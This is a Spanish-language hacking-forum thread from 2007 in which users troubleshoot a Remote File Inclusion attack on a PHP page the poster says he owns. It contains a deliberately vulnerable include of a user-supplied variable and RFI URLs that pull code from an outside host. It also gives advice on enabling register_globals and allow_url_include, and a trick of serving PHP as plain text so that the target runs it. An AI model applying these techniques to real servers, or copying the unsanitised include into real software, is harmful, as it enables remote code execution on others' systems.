elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda con un RFI		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con un RFI  (Leído 5,298 veces)
dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Ayuda con un RFI
« en: 9 Abril 2007, 22:32 pm »
Haber, mi intencion es hacerme un RFI (Remote File incluse) a esta dirección:
http://dimitrix.webcindario.com/prueba/index.php

el codigo del index.php es:
Código:
<p>Esta web es inCrackeable</p>
<?php
include("$canal.php")
?>

y le quiero hacer un include con este archivo:
http://www.dimitrix.es/canal.php/ que tiene de codigo esto:
Código:
<html>

<?php
$fp = fopen("archivo.txt","w+");
fclose($fp);
?>

con esto conseguiri crear un archivo llamado archivo.txt en
http://dimitrix.webcindario.com/prueba/

yo lo hago de la siguiente forma:
http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.php

pero como que no me va y me da error, como seria¿?

no es nada ilegal ya q los housting son mios.
Gracias.
En línea



Zinc


Desconectado Desconectado

Mensajes: 2.194

Argentina


Ver Perfil
Re: Ayuda con un RFI
« Respuesta #1 en: 10 Abril 2007, 03:10 am »
La shell no deberia ser, un archivo de texto?.  :o

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!
En línea
dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Ayuda con un RFI
« Respuesta #2 en: 10 Abril 2007, 13:03 pm »
no por que si te fijas el include pide el archivo canal.php
En línea



alone-in-the-chat


Desconectado Desconectado

Mensajes: 587


Ver Perfil
Re: Ayuda con un RFI
« Respuesta #3 en: 10 Abril 2007, 18:08 pm »
Prueba kitandole el ".php"
del final
ademas debes de tener habilitado global register en ON al igual que allow_url_fopen si no no funcionara

Código:

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal


saludos
En línea
Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b
dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Ayuda con un RFI
« Respuesta #4 en: 10 Abril 2007, 19:21 pm »
haber para para lo que me has dixo de register ON allow_url:fopen...

seria crear un php.ini y que dentro tenga esto ¿?

register_globals = on
allow_url_fopen = on


Quedaria así ¿?
En línea



alone-in-the-chat


Desconectado Desconectado

Mensajes: 587


Ver Perfil
Re: Ayuda con un RFI
« Respuesta #5 en: 10 Abril 2007, 20:25 pm »
Se supone que ya tienes el php.ini 
Leete esto

http://www.php.net/manual/en/ini.core.php#ini.register-globals
En línea
Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: Ayuda con un RFI
« Respuesta #6 en: 10 Abril 2007, 21:00 pm »
Ponelo asi
Código:
<p>Esta web es inCrackeable</p>
<?php
$canal = $_GET['canal'];
include("$canal".".php")
?>
y entonces haces
Código:
index.php?canal=http://www.dimitrix.es/canal
En línea
dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Ayuda con un RFI
« Respuesta #7 en: 10 Abril 2007, 21:21 pm »
nada de nada, pero gracias a todos.
En línea



Universal SAC

Desconectado Desconectado

Mensajes: 41


Universal SAC


Ver Perfil
Re: Ayuda con un RFI
« Respuesta #8 en: 22 Abril 2007, 20:37 pm »
Código:
<p>Esta web es inCrackeable</p>
<?php
$canal = $_GET['canal'];
include("$canal".".php")
?>

Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.
En línea
~UNIVERSAL[HACK]
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Ayuda con un RFI
« Respuesta #9 en: 22 Abril 2007, 21:59 pm »
Cita de: Zinc en 10 Abril 2007, 03:10 am
La shell no deberia ser, un archivo de texto?.  :o

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!

Cita de: Universal SAC en 22 Abril 2007, 20:37 pm
Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.


Os equivocais, mientras el código se encuentre en texto plano no habrá ningún problema...

Código:
<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>";
?>

allow_url_include = On
« Última modificación: 21 Marzo 2009, 02:17 am por yeikos » En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines